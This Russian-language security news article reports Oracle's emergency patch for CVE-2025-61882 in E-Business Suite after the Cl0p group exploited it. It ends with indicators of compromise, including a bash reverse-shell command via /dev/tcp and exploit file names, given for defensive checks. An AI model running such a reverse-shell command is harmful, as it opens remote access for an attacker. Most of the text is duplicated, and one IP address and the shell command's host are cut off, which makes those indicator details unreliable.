Компания Oracle выпустила экстренное обновление безопасности для устранения критической уязвимости нулевого дня (CVE-2025-61882) в своем продукте E-Business Suite. Выпуск патча был вызван активной эксплуатацией уязвимости в реальных условиях хакерской группировкой Cl0p, которая использовала ее в августе 2025 года для проведения широкомасштабной кампании по краже данных у множества организаций.
Уязвимость CVE-2025-61882 получила оценку 9.8 из 10 по шкале CVSS, что соответствует критическому уровню опасности. Проблема затрагивает компонент Oracle Concurrent Processing и может быть использована удаленно через сеть по протоколу HTTP без какой-либо аутентификации. Успешная эксплуатация позволяет злоумышленнику полностью скомпрометировать компонент и выполнить произвольный код на целевой системе.
За атаками стоит известная группа вымогателей Cl0p. В августе 2025 года она провела кампанию, которую компания Mandiant (принадлежащая Google) охарактеризовала как «массовую рассылку по электронной почте», запущенную с сотен скомпрометированных учетных записей. Целью кампании была кража больших объемов конфиденциальной информации.
Анализ показал, что Cl0p использовала комбинированный подход. Группировка эксплуатировала как ранее известные уязвимости в Oracle E-Business Suite, исправленные в обновлении от июля 2025 года, так и новую уязвимость нулевого дня CVE-2025-61882, что позволило достичь максимального охвата целей.
Роб Духарт, директор по безопасности Oracle, сообщил, что исправления для CVE-2025-61882 также включают обновления против «дополнительной потенциальной эксплуатации», выявленной в ходе внутреннего расследования компании. Это указывает на комплексный характер угрозы, обнаруженной специалистами Oracle.
Ключевое предупреждение исходит от Чарльза Кармакала, технического директора Mandiant в Google Cloud. В своем сообщении на LinkedIn он подчеркнул, что массовая эксплуатация уязвимости нулевого дня уже произошла. Это означает, что многие организации могли быть скомпрометированы еще до выхода официального патча.
В связи с этим Кармакал настоятельно рекомендует всем организациям, использующим Oracle E-Business Suite, провести тщательное расследование своих систем на предмет возможной компрометации. Простая установка обновления не гарантирует безопасность, если злоумышленники уже получили доступ к инфраструктуре.
Ожидается, что после публикации информации об уязвимости другие киберпреступные группы также начнут ее использовать. Этот процесс, известный как «эксплуатация n-day», представляет дополнительную угрозу для компаний, которые не успеют оперативно установить исправление и проверить свои системы на наличие следов взлома.
Для выявления компрометации системным администраторам рекомендуется проверить наличие подозрительной активности, связанной со следующими индикаторами. Была зафиксирована сетевая активность (GET и POST запросы) с IP-адресов
В системах может присутствовать вредоносная команда оболочки, предназначенная для создания обратного TCP-соединения (reverse shell) с сервером злоумышленника:
Также следует обратить внимание на наличие файлов с именами, указывающими на эксплуатацию уязвимости. К таким файлам относятся:
Изображение носит иллюстративный характер
Уязвимость CVE-2025-61882 получила оценку 9.8 из 10 по шкале CVSS, что соответствует критическому уровню опасности. Проблема затрагивает компонент Oracle Concurrent Processing и может быть использована удаленно через сеть по протоколу HTTP без какой-либо аутентификации. Успешная эксплуатация позволяет злоумышленнику полностью скомпрометировать компонент и выполнить произвольный код на целевой системе.
За атаками стоит известная группа вымогателей Cl0p. В августе 2025 года она провела кампанию, которую компания Mandiant (принадлежащая Google) охарактеризовала как «массовую рассылку по электронной почте», запущенную с сотен скомпрометированных учетных записей. Целью кампании была кража больших объемов конфиденциальной информации.
Анализ показал, что Cl0p использовала комбинированный подход. Группировка эксплуатировала как ранее известные уязвимости в Oracle E-Business Suite, исправленные в обновлении от июля 2025 года, так и новую уязвимость нулевого дня CVE-2025-61882, что позволило достичь максимального охвата целей.
Роб Духарт, директор по безопасности Oracle, сообщил, что исправления для CVE-2025-61882 также включают обновления против «дополнительной потенциальной эксплуатации», выявленной в ходе внутреннего расследования компании. Это указывает на комплексный характер угрозы, обнаруженной специалистами Oracle.
Ключевое предупреждение исходит от Чарльза Кармакала, технического директора Mandiant в Google Cloud. В своем сообщении на LinkedIn он подчеркнул, что массовая эксплуатация уязвимости нулевого дня уже произошла. Это означает, что многие организации могли быть скомпрометированы еще до выхода официального патча.
В связи с этим Кармакал настоятельно рекомендует всем организациям, использующим Oracle E-Business Suite, провести тщательное расследование своих систем на предмет возможной компрометации. Простая установка обновления не гарантирует безопасность, если злоумышленники уже получили доступ к инфраструктуре.
Ожидается, что после публикации информации об уязвимости другие киберпреступные группы также начнут ее использовать. Этот процесс, известный как «эксплуатация n-day», представляет дополнительную угрозу для компаний, которые не успеют оперативно установить исправление и проверить свои системы на наличие следов взлома.
Для выявления компрометации системным администраторам рекомендуется проверить наличие подозрительной активности, связанной со следующими индикаторами. Была зафиксирована сетевая активность (GET и POST запросы) с IP-адресов
107.207[.]26 и 185.181.60[.]11. В системах может присутствовать вредоносная команда оболочки, предназначенная для создания обратного TCP-соединения (reverse shell) с сервером злоумышленника:
sh -c /bin/bash -i >& /dev/tcp// 0>&1. Также следует обратить внимание на наличие файлов с именами, указывающими на эксплуатацию уязвимости. К таким файлам относятся:
oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py и oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py.
